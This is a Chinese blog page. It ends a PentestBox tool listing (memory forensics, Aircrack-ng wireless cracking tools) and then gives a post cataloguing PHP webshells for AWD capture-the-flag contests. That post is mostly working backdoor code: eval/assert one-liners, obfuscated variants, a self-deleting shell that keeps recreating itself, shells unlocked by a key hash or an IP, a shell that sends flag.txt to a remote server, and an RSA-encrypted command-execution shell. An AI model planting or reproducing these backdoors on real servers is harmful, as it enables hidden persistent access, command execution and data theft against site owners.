—Rekall框架是一个完全开放的工具集合,在GNU通用公共许可证下的Python中实现,用于从易失性内存(RAM)样本中提取数字工件。 提取技术完全独立于所研究的系统来执行,但是提供了到系统的运行时状态的可见性。作者:谷歌许可:GPLv2cmd.exe C:\Users\Demon\Desktop >rekall cmd.exe C:\Users\Demon\Desktop >winpmem Volatility—–Volatility框架是一个完全开放的工具集合,在GNU通用公共许可证下的Python中实现,用于从易失性内存(RAM)样本中提取数字工件。 提取技术完全独立于所研究的系统来执行,但是提供了到系统的运行时状态的可见性。 该框架旨在向人们介绍与从易失性内存采样中提取数字伪像相关的技术和复杂性,并为这一令人兴奋的研究领域提供进一步工作的平台。作者:稳定的基础许可:GPLv3cmd.exe C:\Users\Demon\Desktop >volatility 无线攻击Aircrack-ng–Aircrack-ng 802.11是一个WEP和WPA-PSK密钥破解程序,可以恢复密钥一旦足够的数据包捕获。它实现了标准FMS攻击以及一些优化KoreK攻击,以及全新的PTW攻击,从而使攻击速度比其他WEP破解工具。许可:GPLv2cmd.exe C:\Users\Demon\Desktop >airbase-ng cmd.exe C:\Users\Demon\Desktop >aircrack-ng cmd.exe C:\Users\Demon\Desktop >aircrack-ng-GUI cmd.exe C:\Users\Demon\Desktop >airdecap-ng cmd.exe C:\Users\Demon\Desktop >airdecloak-ng cmd.exe C:\Users\Demon\Desktop >aireplay-ng cmd.exe C:\Users\Demon\Desktop >airodump-ng cmd.exe C:\Users\Demon\Desktop >airolib-ng cmd.exe C:\Users\Demon\Desktop >airtun-ng cmd.exe C:\Users\Demon\Desktop >besside-ng cmd.exe C:\Users\Demon\Desktop >easside-ng cmd.exe C:\Users\Demon\Desktop >ivstools cmd.exe C:\Users\Demon\Desktop >kstats cmd.exe C:\Users\Demon\Desktop >makeivs-ng cmd.exe C:\Users\Demon\Desktop >packetforge-ng cmd.exe C:\Users\Demon\Desktop >tkiptun-ng cmd.exe C:\Users\Demon\Desktop >wesside-ng cmd.exe C:\Users\Demon\Desktop >wpaclean 6.13 文本编辑器使PenetestBox更棒,我补充道原子和vim文本编辑器。打开后原子会绝交Atom一边和终端的屏幕另一方面,虽然vim运行在相同的选项卡。原子分裂做是为了使报告更容易给控制台访问和编辑相同的屏幕上。cmd.exe C:\Users\Demon\Desktop >atom cmd.exe C:\Users\Demon\Desktop >vim 6.14 Linux实用程序PentestBox提供几乎所有Linux实用程序在Windows环境中。下面的列表里面PentestBox Linux实用程序antiword, basename, bash, bison, bzip2, cat, chmod, cmp, connect, cp, curl, cut, date, diff, dirname, du, env, expr, false, find, flex, gawk, git, grep, gunzip, gzip, head, id, kill, mkdir, md5sum, ls, ln , mv, openssl, patch, ps, rebase, rm, rmdir, scp, sh, ssh-keygen, touch, tr, true, uname, uniq, unzip, wc, xargs也使PentestBox更棒,我们也包括HTTPie,HTTPie是一个命令行HTTP客户端。它的目标是使CLI与web服务交互尽可能人性化。它提供了一个简单的http命令,允许发送任意http请求使用一个简单的和自然的语法,并显示彩色的输出。HTTPie可以用于测试、调试和一般与HTTP服务器交互。6.15 浏览器PentestBox还包含一个修改后的版本Mozilla Firefox所有的安全插件前安装。查看所有以前安装的插件,点击在这里cmd.exe C:\Users\Demon\Desktop >firefox 同时,我们已经包括在内SQLite浏览器在里面。cmd.exe C:\Users\Demon\Desktop >sqlitebrowser http://www.secist.com/archives/2440.htmlhttps://tools.pentestbox.org/#linux-utilitie作者:Hell0_C链接:https://www.jianshu.com/p/022b0090d640来源:简书著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
2019年12月09日
2,297 阅读
0 评论
0 点赞
2019-12-06
AWD模式下的各类PHP木马
经典一句话木马最最常见的PHP木马,经典,但也满足不了我们的需求,很容易被大佬识破<?php @eval($_POST["cmd"]); ?> <?php @assert($_POST['cmd']);?> 混淆马:让木马内容难以识别<?php assert($_POST[-7]); ?> 变换成<?php @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r'; @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t'; @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]); $_POST[0]($_POST[1]); 变换成<?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _P $__.=("/"^"`"); // _PO $__.=("|"^"/"); // _POS $__.=("{"^"/"); // _POST ${$__}[!$_](${$__}[$_]); // ?> 不死马:哪怕被发现也很难被清除<?php set_time_limit(0); //PHP脚本限制了执行时间,set_time_limit(0)设置一个脚本的执行时间为无限长 ignore_user_abort(1); //ignore_user_abort如果设置为 TRUE,则忽略与用户的断开,脚本将继续运行。 unlink(__FILE__); //删除自身 while(1) { file_put_contents('shell.php','<?php @eval($_POST["password"]);?>'); //创建shell.php sleep(0); //间隔时间 } 对付这种木马,目前最有效的办法就是重启PHP服务器。但在awd模式下,一般无权限,可以通过不断复写shell.php来达到该木马难以被使用的效果。<?php set_time_limit(0); // 取消脚本运行时间的超时上限 ignore_user_abort(1); // 后台运行 while(1) { file_put_contents('shell.php','11111111'); //创建shell.php sleep(0); } 也可以用bash命令,不断删除该木马文件while : ;do rm -rf xxx; done; MD5验证木马:比赛时有的队伍批量种马,但被攻击的服务却可以通过分析本地的木马,然后去连接其他服务器内的相同木马获取flag。md5验证木马由此产生。防止其他队伍进行分析。<?php if(md5($_GET['key1'])==="202cb962ac59075b964b07152d234b70") { @eval($_POST['key2']); } ?> 接收key1的值进行MD5,然后比较,相同才执行key2的命令 菜刀使用方式 http://x.x.x.x/shell.php?key1=123 密码是key2一般使用方式 http://x.x.x.x/shell.php?key1=123&key2=命令 IP验证木马:MD5马相对普通马,安全性有了一定提升,但并不能完全杜绝其他队伍的利用。一些队伍可以在php页面内包含waf,抓取流量来获取木马的利用url,可以看到连接小马获取flag的参数。经过复现后,同样能获得flag。于是,我就自然而然的想到了识别ip的php马。<?php $ip="x.x.x.x"; //自己的ip if ($_SERVER['REMOTE_ADDR']===$ip) { @eval($_POST["cmd"]); } php回弹木马:后来我又想到另外一种隐蔽的方式,让被攻击端主动发送flag到我的服务器,同时也只在后台悄悄的运行。<?php set_time_limit(0); // 取消脚本运行时间的超时上限 ignore_user_abort(1); // 后台运行 unlink(__FILE__); //删除本文件 while(1){ $file="flag.txt"; //设定要读取的文件 $flag=file_get_contents($file); //在自己的计算机上打开服务器,输入ip让其访问。并创建一个php记录访问的值,jiflag $url="http://192.168.50.1/jilu.php?flag=".$flag; $html=file_get_contents($url); sleep(10);} ?> RSA公钥加解密木马服务器端的php木马负责接收攻击端的指令并执行,将执行结果公钥加密后发回,哪怕别人抓流量复现也只能得到加密后的结果。在此,我只给出服务端的php代码:<?php class Rsa { public $private_key = ''; public $public_key = '-----BEGIN PUBLIC KEY----- MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFSrrcjL328bU+DpvsOm1R++GGa/ RuHLkGZvAXOF+iWp6oJQ00ekeCWo82jNz+5eyubr7Sz1WcBp0/u4pQQpts43G334 lP9/2xXAXU4dvqs/XPnFLaryp93u+AE3fTQbvq81OpqVwlYNA+vuXUzYxfCakU2l qnEzo5bRNM0IL5ixAgMBAAE= -----END PUBLIC KEY-----'; public $encrypted = ''; public $decrypted = ""; public $data = ''; public function init($file) { $this-> data = file_get_contents($file); return $this->data; } public function encrypt($data) { openssl_public_encrypt($data,$encrypted,$this->public_key);//公钥加密 $encrypted = base64_encode($encrypted); return $encrypted; } public function decrypt_cmd($c) { print $c; openssl_public_decrypt(base64_decode($c),$decrypted,$this->public_key);//私钥加密的内容通过公钥可解密出来 echo "\n"; echo "public key decrypt:\n"; print $decrypted; echo `$decrypted`; #passthru($decrypted); } public function publicDecrypt($data, $publicKey) { openssl_public_decrypt($data, $decrypted, $publicKey); return $decrypted; } } function publicDecrypt($data, $publicKey) { openssl_public_decrypt($data, $decrypted, $publicKey); return $decrypted; } @$i = $_GET['i']; $rsa =new Rsa(); #1是直接读flag文件 if($i==1) { $flag_path="flag"; $data1=$rsa->init($flag_path); #print $data1; $data2=$rsa->encrypt($data1); print $data2; } #2是执行命令 if($i==2) { @$c = $_GET['c']; $cmd = base64_decode($cmd); $a=`$cmd`; $a2=$rsa->encrypt($a); echo $a2; } ?> 参考:那些强悍的PHP一句话后门http://www.freebuf.com/articles/web/9396.html
2019年12月06日
1,942 阅读
0 评论
0 点赞
1
2
...
8